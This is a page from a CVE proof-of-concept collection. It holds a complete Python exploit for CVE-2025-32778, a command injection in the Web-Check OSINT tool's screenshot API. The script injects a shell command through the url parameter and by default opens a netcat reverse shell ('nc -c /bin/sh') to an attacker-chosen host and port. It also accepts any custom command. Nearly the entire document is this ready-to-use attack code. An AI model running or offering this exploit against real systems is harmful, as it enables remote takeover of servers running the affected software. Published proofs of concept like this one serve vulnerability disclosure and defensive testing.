4837 Total CVEs
26 Years
GitHub
Home / 2025 / CVE-2025-32778
README.md
Rendering markdown...
POC / cve-2025-32778.py PY
⬇ Raw GitHub ✕ Close 
import requests as req
import argparse
import urllib.parse


def banner():
    BANNER = r"""
  ______     _______     ____   ___ ____  ____       _________ _____ _____ ___  
 / ___\ \   / / ____|   |___ \ / _ \___ \| ___|     |___ /___ \___  |___  ( _ ) 
| |    \ \ / /|  _| _____ __) | | | |__) |___ \ _____ |_ \ __) | / /   / // _ \ 
| |___  \ V / | |__|_____/ __/| |_| / __/ ___) |_____|__) / __/ / /   / /| (_) |
 \____|  \_/  |_____|   |_____|\___/_____|____/     |____/_____/_/   /_/  \___/ 

  ___   ___        ____                 _       
 / _ \ / _ \__  __/ ___|__ _ _ __   ___| | ___  
| | | | | | \ \/ / |   / _` | '_ \ / _ \ |/ _ \ 
| |_| | |_| |>  <| |__| (_| | | | |  __/ | (_) |
 \___/ \___//_/\_\\____\__,_|_| |_|\___|_|\___/ 
    """
    print(BANNER)

def url_encode(s: str):
    return urllib.parse.quote(s)

def revshell(lhost, lport):
    shell = f"nc -c /bin/sh {lhost} {lport}"
    return url_encode(shell)

def exploit(url, shell):
    exploit_url = f'{url}/api/screenshot/?url=https://google.com/"; {shell};echo "'
    return exploit_url

def normalize_url(url):
    parsed = urllib.parse.urlparse(url)
    scheme = parsed.scheme or "http"
    netloc = parsed.netloc or parsed.path
    return f"{scheme}://{netloc}".rstrip('/')

def main():
    """
    Argument parser and main program
    """
    parser = argparse.ArgumentParser(description="Command Injection in Web-Check OSINT Tool developed by Lissy93 ")
    parser.add_argument('-u', '--url', required=True,help='Target Url example (http://vuln.com:8000/api/screenshot)')
    
    # Mutually exclusive args
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('--shell',help='Custom full reverse shell command (RAW, will be URL-encoded by script)')
    group.add_argument('--lhost',help='Local host for the reverse shell')
    
    parser.add_argument('--lport',help='Local port for the reverse shell (requires --lhost, default 4444)')
    args = parser.parse_args()
    
    ###################
    banner()
    ###################
    
    Target_url = normalize_url(args.url)
    lhost = args.lhost
    lport = args.lport
    shell = args.shell
    
    # Validation
    if shell and (lhost or lport):
        parser.error("You cannot use --shell together with --lhost/--lport")
    if lhost and not lport:
        lport = "4444"

    # Payload setup
    if shell:
        print(f"[+] Using custom shell: {shell}")
        print(f"[+] Encoding shell")
        encoded_shell = url_encode(shell)
        final_url = exploit(Target_url, encoded_shell)
    else:
        print(f"[+] Using lhost: {lhost} and lport: {lport}")
        decoded_payload = urllib.parse.unquote(revshell(lhost, lport))
        print(f"[+] Using shell payload: \"{decoded_payload}\"")
        print(f"[+] Encoding payload...")
        final_url = exploit(Target_url, revshell(lhost, lport))
        
    # Send request
    print(f"[+] Connecting to Target...")
    try:
        conn = req.get(final_url,timeout=5)
        print(f"[+] Executing Payload...")
    except req.exceptions.ReadTimeout:
        pass
    except req.exceptions.RequestException as e:
        print(f'[!] HTTP Error: {e}')
    except Exception as e:
        print(f"[!] Error: {e}")
        return 0
    
    print(f"[+] Exploit sent! Wait for your shell to connect...")

if __name__ == "__main__":
    main()